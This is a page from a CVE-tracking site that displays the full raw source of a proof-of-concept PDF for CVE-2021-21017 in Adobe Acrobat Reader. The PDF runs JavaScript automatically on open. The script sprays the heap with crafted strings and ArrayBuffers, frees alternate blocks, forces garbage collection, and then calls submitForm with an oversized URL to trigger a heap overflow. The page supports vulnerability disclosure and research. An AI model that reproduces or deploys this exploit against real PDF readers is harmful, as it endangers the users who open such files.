CVE-2021-21017 – CVE Helper

README.md
Rendering markdown...
POC / CVE-2021-21017.pdf PDF
⬇ Raw GitHub ✕ Close
%PDF-1.7
1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /AcroForm 6 0 R
  /OpenAction 9 0 R
  /URI 11 0 R
  /NeedsRendering true
>>endobj
2 0 obj
<<    
  /Type /Pages    
  /Kids [3 0 R]    
  /Count 1
>>endobj
3 0 obj
<<    
  /Type /Page    
  /Parent 2 0 R    
  /Contents 4 0 R    
  /MediaBox [0 0 612 792]
  /Annots [ 12 0 R ]
  /Resources    
  <<
    /Font <</F1 5 0 R>>
	/ProcSet [/PDF /Text]    
  >>    
  /Annots [8 0 R]
>>
endobj
4 0 obj
<</Length 94>>
stream
BT
/F1 24 Tf
100 600 Td(Your PDF reader does not support XFA if you see this sentence.) Tj
ET
endstream
endobj
5 0 obj
<<
  /Type /Font    
  /Subtype /Type1    
  /Name /F1    
  /BaseFont 
  /Helvetica    
  /Encoding 
  /MacRomanEncoding
>>endobj
6 0 obj
<<    
  /Fields [7 0 R]
  /XFA 8 0 R
>>
endobj
7 0 obj
<<
  /Type /Annot    
  /Subtype /Widget    
  /FT /Tx    
  /P 3 0 R    
  /T (MyField1)    
  /H /N    
  /F 6    
  /Ff 65536    
  /DA (/F1 12 Tf 1 1 1 rg)    
  /Rect [10 600 11 700]
  /V (The quick brown fox ate the lazy mouse)
>>
endobj
8 0 obj
<</Length 1404>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.1/">
    <subform name="form1" layout="tb" locale="en_US">
	  <pageSet>
	    <pageArea name="Page1" id="Page1">
		  <contentArea x="0.25in" y="0.25in" w="197.3mm" h="284.3mm"/>
		</pageArea>
	  </pageSet>
      <subform>
	    <draw name="Text" h="0.372417in" w="5.943625in">
	      <ui>
	        <textEdit>
		      <margin/>
		    </textEdit>
	      </ui>
	      <value>
	        <text></text>
	      </value>
	      <font size="24pt" typeface="Myriad Pro" baselineShift="0pt"/>
	    </draw>
      </subform>
	</subform>  
  </template>
  <config xmlns="http://www.xfa.org/schema/xci/1.0/">
    <present>
	  <destination>pdf</destination>
	  <pdf>
	    <interactive>1</interactive>
	  </pdf>
	</present>
  </config>
</xdp:xdp>
endstream
endobj
9 0 obj
<<
  /Type /Action    
  /S /JavaScript    
  /JS 10 0 R
>>endobj
10 0 obj
<</Length 48>>
stream

function gc() {
  new ArrayBuffer(3 * 1024 * 1024 * 100);
}

function createArrayBuffer(blockSize) {
  var ab = new ArrayBuffer(blockSize - 0x10);
  var u8 = new Uint8Array(ab);
  for (var i = 0; i < ab.byteLength; i++) {
    u8[i] = 0x41;
  }
  return ab;
}

var strBlockSize = 0x110;
var buffBlockSize = 0x120;
var sprayStrLen = (strBlockSize / 2) - 1;
var sprayStr = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%u9090').repeat(sprayStrLen - 5);


var arrS = new Array(0x2000);
for (var i = 0; i < arrS.length; i++) {
  arrS[i] = sprayStr.substr(0, sprayStrLen).toUpperCase();
}
for (var i = 0; i < arrS.length; i += 2) {
  arrS[i] = null;
  arrS[i] = undefined;
}

var arrB = new Array(0x2000);
for (var i = 0; i < arrB.length; i++) {
  arrB[i] = createArrayBuffer(buffBlockSize);
}
for (var i = 0; i < arrB.length; i += 2) {
  arrB[i] = null;
  arrB[i] = undefined;
}

gc();

this.submitForm('bb' + 'a'.repeat(strBlockSize - 2 - 1));

endstream
endobj
11 0 obj
<<
/Base <FEFF414141414141414141413A2F2F>
>>
endobj
xref
0000000000 65535 f
0000000010 00000 n
0000000143 00000 n
0000000219 00000 n
0000000443 00000 n
0000000588 00000 n
0000000724 00000 n
0000000781 00000 n
0000001033 00000 n
0000002491 00000 n
0000002570 00000 n
0000002600 00000 n
trailer <</Root 1 0 R/Size 12>>
startxref
2670
%%EOF